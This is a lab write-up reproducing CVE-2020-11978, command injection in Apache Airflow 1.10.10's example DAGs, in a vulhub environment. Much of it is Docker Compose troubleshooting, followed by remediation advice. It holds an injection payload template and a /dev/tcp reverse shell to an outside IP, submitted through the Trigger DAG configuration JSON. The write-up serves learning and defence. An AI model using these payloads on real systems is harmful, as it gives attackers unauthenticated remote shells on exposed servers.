Vulnerability reproduction: command injection in the Apache Airflow example DAG (CVE-2020-11978)

When you're a noob, you just have to study more.

Environment: vulhub

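Apache Airflow is an open-source, distributed task scheduling framework. The example DAGs shipped with version 1.10.10 and earlier contain a command injection vulnerability that lets an unauthenticated visitor execute arbitrary commands on the Worker.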

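According to the vulhub documentation, the following commands need to be run in order to start airflow 1.10.10:

    # Initialize the database
    docker-compose run airflow-init

    # Start the services
    docker-compose up -d

But when I ran them, I got an error: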

    The Compose file './docker-compose.yml' is invalid because:
    Invalid top-level property "x-airflow-common". Valid top-level sections for this Compose file are: version, services, networks, volumes, and extensions starting with "x-".

    You might be seeing this error because you're using the wrong Compose file version. Either specify a supported version (e.g "2.2" or "3.3") and place your service definitions under the `services` key, or omit the `version` key and place your service definitions at the root of the file to use version 1.
    For more on the Compose file format versions, see https://docs.docker.com/compose/compose-file/

    services.airflow-init.depends_on contains an invalid type, it should be an array
    services.airflow-scheduler.depends_on contains an invalid type, it should be an array
    services.airflow-webserver.depends_on contains an invalid type, it should be an array
    services.airflow-worker.depends_on contains an invalid type, it should be an array
    services.flower.depends_on contains an invalid type, it should be an array

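My Docker skills aren't yet up to solving this, so I asked GPT for help.

It said:

Judging by the error message, this Compose file does not seem to meet Docker Compose's format requirements. The error message points to several problems:

x-airflow-common: a custom property named x-airflow-common is not allowed among the top-level properties of a Docker Compose file. Valid top-level properties include version, services, networks, volumes, and extension properties starting with x-.

depends_on: the depends_on property should be an array rather than a single value. When specifying service dependencies, wrap the dependencies in square brackets, for example depends_on: [redis].

To address these problems, you can make the following changes:

- Remove the x-airflow-common section and move its configuration into each service's definition.

- Change the value of the depends_on property to array form.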
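The second change can be sketched in Python on an already-parsed Compose file. This is only an illustration, assuming the original file uses the mapping form of depends_on (service name mapped to a condition), which is what the "should be an array" error suggests. The function name and the sample service are hypothetical, and converting this way drops the health-check conditions.

```python
def depends_on_as_list(service):
    """Return a copy of a service definition with depends_on as a plain list."""
    converted = dict(service)
    deps = service.get("depends_on")
    if isinstance(deps, dict):
        # Mapping form: keep only the service names, dropping the conditions.
        converted["depends_on"] = list(deps)
    return converted


# Hypothetical service definition, as it might look after parsing the YAML.
worker = {
    "image": "vulhub/airflow:1.10.10",
    "depends_on": {
        "redis": {"condition": "service_healthy"},
        "postgres": {"condition": "service_healthy"},
    },
}

print(depends_on_as_list(worker)["depends_on"])
```

The original dictionary is left untouched, so the converted copy can be compared against it before writing anything back.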

Then it gave a modified version:

    version: '3'
    services:
      postgres:
        image: postgres:13-alpine
        environment:
          POSTGRES_USER: airflow
          POSTGRES_PASSWORD: airflow
          POSTGRES_DB: airflow
        healthcheck:
          test: ["CMD", "pg_isready", "-U", "airflow"]
          interval: 5s
          retries: 5

      redis:
        image: redis:5-alpine
        healthcheck:
          test: ["CMD", "redis-cli", "ping"]
          interval: 5s
          timeout: 30s
          retries: 50

      airflow-webserver:
        image: vulhub/airflow:1.10.10
        environment:
          - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
          - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
          - AIRFLOW__CORE__FERNET_KEY=
          - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
          - AIRFLOW__CORE__LOAD_EXAMPLES=true
          - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
        user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
        depends_on:
          - redis
          - postgres
        command: webserver
        ports:
          - 8080:8080
        healthcheck:
          test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
          interval: 10s
          timeout: 10s
          retries: 5

      airflow-scheduler:
        image: vulhub/airflow:1.10.10
        environment:
          - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
          - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
          - AIRFLOW__CORE__FERNET_KEY=
          - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
          - AIRFLOW__CORE__LOAD_EXAMPLES=true
          - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
        user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
        depends_on:
          - redis
          - postgres
        command: scheduler
        healthcheck:
          test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
          interval: 10s
          timeout: 10s
          retries: 5

      airflow-worker:
        image: vulhub/airflow:1.10.10
        environment:
          - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
          - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
          - AIRFLOW__CORE__FERNET_KEY=
          - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
          - AIRFLOW__CORE__LOAD_EXAMPLES=true
          - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
        user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
        depends_on:
          - redis
          - postgres
        command: worker
        healthcheck:
          test:
            - "CMD-SHELL"
            - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
          interval: 10s
          timeout: 10s
          retries: 5

      airflow-init:
        image: vulhub/airflow:1.10.10
        environment:
          - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
          - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
          - AIRFLOW__CORE__FERNET_KEY=
          - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
          - AIRFLOW__CORE__LOAD_EXAMPLES=true
          - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
          - _AIRFLOW_DB_UPGRADE=true
        user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
        depends_on:
          - redis
          - postgres
        command: initdb

      flower:
        image: vulhub/airflow:1.10.10
        environment:
          - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
          - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
          - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
          - AIRFLOW__CORE__FERNET_KEY=
          - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
          - AIRFLOW__CORE__LOAD_EXAMPLES=true
          - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
        user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
        depends_on:
          - redis
          - postgres
        command: flower
        ports:
          - 5555:5555
        healthcheck:
          test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
          interval: 10s
          timeout: 10s
          retries: 5

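After replacing the contents of docker-compose.yml with this, it ran successfully.

Then the author replied, saying to upgrade docker-compose, or to just run the commands with docker compose directly.

My docker-compose version is 1.25.0. It turns out none of this hassle was necessary: with a newer version the original file ran perfectly smoothly...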
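A quick check like the one below would have caught this before I went down the rewrite path. It is a minimal sketch, assuming that 1.27.0 is the first docker-compose release that accepts Compose files without a top-level version key. That threshold is my own assumption, not something from the vulhub docs, and the helper names are hypothetical.

```python
import re

# Assumption: 1.27.0 is the first docker-compose release that accepts
# Compose files without a top-level "version" key.
MIN_VERSION = (1, 27, 0)


def parse_version(text):
    """Extract (major, minor, patch) from a version string such as '1.25.0'."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"no version number found in {text!r}")
    return tuple(int(part) for part in match.groups())


def is_new_enough(text, minimum=MIN_VERSION):
    """Compare the parsed version tuple against the assumed minimum."""
    return parse_version(text) >= minimum


print(is_new_enough("1.25.0"))
print(is_new_enough("docker-compose version 1.29.2, build 5becea4c"))
```

The string to feed in can be copied from the output of docker-compose --version.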

To avoid this kind of minor embarrassment, I need to keep learning Docker...



Visit http://your-ip:8080 to open the Airflow admin UI, and switch the toggle in front of example_trigger_target_dag from Off to On:



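Click example_trigger_target_dag to open its page, then click Trigger DAG to get to the debugging page.

In Configuration JSON, enter the command you want to execute:

    {"message":"'\";your command;#"}

I went straight for a reverse shell:

    {"message":"'\";sh -i >& /dev/tcp/192.168.110.12/6666 0>&1;#"}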
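To see why the payload has this shape, it helps to render the command by hand. The sketch below assumes the vulnerable example DAG builds its bash_command by dropping the message into a template of the form echo "Here is the message: '...'", which is my reading of the 1.10.10 example DAG. The plain string replacement stands in for Airflow's Jinja rendering, the function name is hypothetical, and id is a harmless stand-in for the real command.

```python
import json

# Assumed shape of the vulnerable bash_command; MESSAGE marks where the
# templated dag_run.conf["message"] value ends up.
TEMPLATE = "echo \"Here is the message: 'MESSAGE'\""


def render(conf_json):
    """Substitute the message from the Configuration JSON into the template."""
    message = json.loads(conf_json)["message"]
    return TEMPLATE.replace("MESSAGE", message)


# Harmless stand-in for "your command".
payload = r'''{"message":"'\";id;#"}'''
print(render(payload))
```

In the rendered line, the leading single quote is just text inside the double-quoted string, the double quote then closes that string, each semicolon ends a command, and # turns the leftover quotes into a comment.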

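Remediation

Upgrade to a version later than 1.10.10, and delete or disable the default DAGs (either delete them, or disable them in the configuration file with load_examples=False).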
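Whether the examples are really switched off can be checked with a few lines of Python. This is a minimal sketch, assuming the setting lives under the [core] section of airflow.cfg. The sample config text and the function name are made up for illustration, and an environment variable such as the AIRFLOW__CORE__LOAD_EXAMPLES=true seen in the compose file above is not taken into account here.

```python
import configparser

# Hypothetical airflow.cfg fragment with the example DAGs disabled.
SAMPLE_CFG = """
[core]
load_examples = False
"""


def examples_disabled(cfg_text):
    """Return True when [core] load_examples is set to a false value."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(cfg_text)
    # Assumption for this sketch: a missing option counts as enabled,
    # since Airflow loads the examples by default.
    return not parser.getboolean("core", "load_examples", fallback=True)


print(examples_disabled(SAMPLE_CFG))
```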

References:

Vulhub - Docker-Compose file for vulnerability environment